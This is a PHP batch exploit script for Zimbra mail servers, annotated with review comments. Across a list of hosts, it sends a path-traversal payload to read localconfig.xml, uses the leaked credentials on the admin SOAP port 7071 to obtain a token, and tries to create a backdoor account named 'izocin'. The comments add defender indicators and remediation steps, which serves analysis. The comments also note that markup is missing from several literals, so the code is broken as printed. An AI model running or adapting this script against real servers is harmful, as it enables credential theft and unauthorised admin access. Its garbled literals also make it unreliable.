$toket$req";
return $body;
}
// Batch driver. Reads a host list from the file named in $argv[1] and, per host:
//   1. requests a Zimbra resource URL whose `skin` parameter traverses to
//      /opt/zimbra/conf/localconfig.xml (local file inclusion),
//   2. tries to extract two values from the response,
//   3. submits them to the admin SOAP endpoint on port 7071 to obtain an authToken,
//   4. sends further SOAP requests meant to create an account with a fixed
//      name and password.
// Artefacts a defender can match on, all taken from the code below: the request
// path containing `skin=../` and `localconfig.xml%00`, the fixed Firefox/32.0
// User-Agent, SOAP traffic to /service/admin/soap on 7071, and an account whose
// local part is "izocin". A host that logged the first request should be treated
// as having exposed localconfig.xml: rotate the secrets stored there, audit the
// admin account list, and restrict 7071 to management networks.
// NOTE(review): several literals here ($body, $req, $req2, $req3, the explode()
// separators and some regexes) look like they lost their XML markup when the page
// was extracted. As shown, explode('') has an empty separator, which PHP rejects
// (ValueError on PHP 8), so this listing does not run as printed.
// ngecek() is defined outside this view, and only the tail of nganu_body() is
// visible above this block.
if(!$argv[1]){
die("usage $argv[0] list.txt ");
}
// Read errors are suppressed by @, so an unreadable list file is not reported.
$getlist=@file_get_contents($argv[1]);
// Entries are split on CRLF only.
$ex=explode("\r\n",$getlist);
echo "\n\t Total sites : ".count($ex)."\n";
foreach($ex as $izo){
$array = array();
// Strip scheme / "www." fragments and every ':' from the entry; removing ':'
// also drops any port the entry carried.
$int = array('https://www.','http://',':','www.','https');
$replace = str_replace($int, "", $izo);
// substr(..., 0) returns the string unchanged.
$maw = substr($replace,0);
$target = $maw;
// Fixed name and password used for the account the script tries to create;
// the same value for both makes it a simple indicator to search for.
$user_baru = "izocin";
$pwd_baru = "izocin";
// Path-traversal payload in the `skin` parameter, ending in a URL-encoded NUL byte.
$lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
$link_lfi = "$target/$lfi";
echo "# scanning --->$target\n";
$ch2 = curl_init ("$link_lfi");
// Return the body as a string and follow redirects.
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
// Hard-coded User-Agent string.
curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
// TLS peer and host verification are both switched off.
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
// Cookies are written to and read from a file named coker_log in the working directory.
curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
// The handle is never closed and curl errors are not checked.
$ambil = curl_exec ($ch2);
// Two values are pulled from the response with the same regex; the explode()
// separators are empty in this listing (see the note at the top).
$get_user = explode('', $ambil);
preg_match('/a\["(.*?)<\/value>/', $get_user[1], $user);
$get_pwd = explode('', $ambil);
preg_match('/a\["(.*?)<\/value>/', $get_pwd[1], $pwd);
// `or` binds looser than `!=`, so this reads as: $user[1] or ($pwd[1] != "").
if($user[1] or $pwd[1] != ""){
echo "# Deneniyor...\n";
// Request body built from the two extracted values; the surrounding markup is
// missing from this listing.
$body = "
$user[1]$pwd[1]";
// Admin SOAP endpoint on the admin port.
$link = "https://$target:7071/service/admin/soap";
$token = ngecek($link,$body);
preg_match('/(.*)<\/authToken>/', $token, $toket);
if($toket[1]==""){
echo "# token cekilemedi\n\n";
}
else{
echo "#token: $toket[1]\n";
// Empty request payload as printed; presumably markup was lost here too.
$req = @("");
$body2 = nganu_body($toket[1],$req);
$liat = ngecek($link,$body2);
// Capture a domain name from the response; it is used for the new account's address.
preg_match('/(.*?)<\/a>/', $liat, $domain);
echo "# Creating Account...\n";
$req2 = "$user_baru@$domain[1]$pwd_baru";
$body3 = nganu_body($toket[1],$req2);
$liat2 = ngecek($link,$body3);
// Capture the id of the account from the response.
preg_match('/account id="(.*)" name="/', $liat2, $new);
// Follow-up request carrying that id and the literal TRUE; the attribute it
// sets is not visible in this listing.
$req3 = "$new[1]TRUE";
$body4 = nganu_body($toket[1],$req3);
$liat3 = ngecek($link,$body4);
// "Success" is printed unconditionally: none of the three responses is checked,
// so this output alone does not show that an account exists on the host.
echo "# Success\n";
echo "# Login Panel: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password: $pwd_baru\n\n";
}
}
else{
echo "# not Vulnerable\n\n";
}
}
?>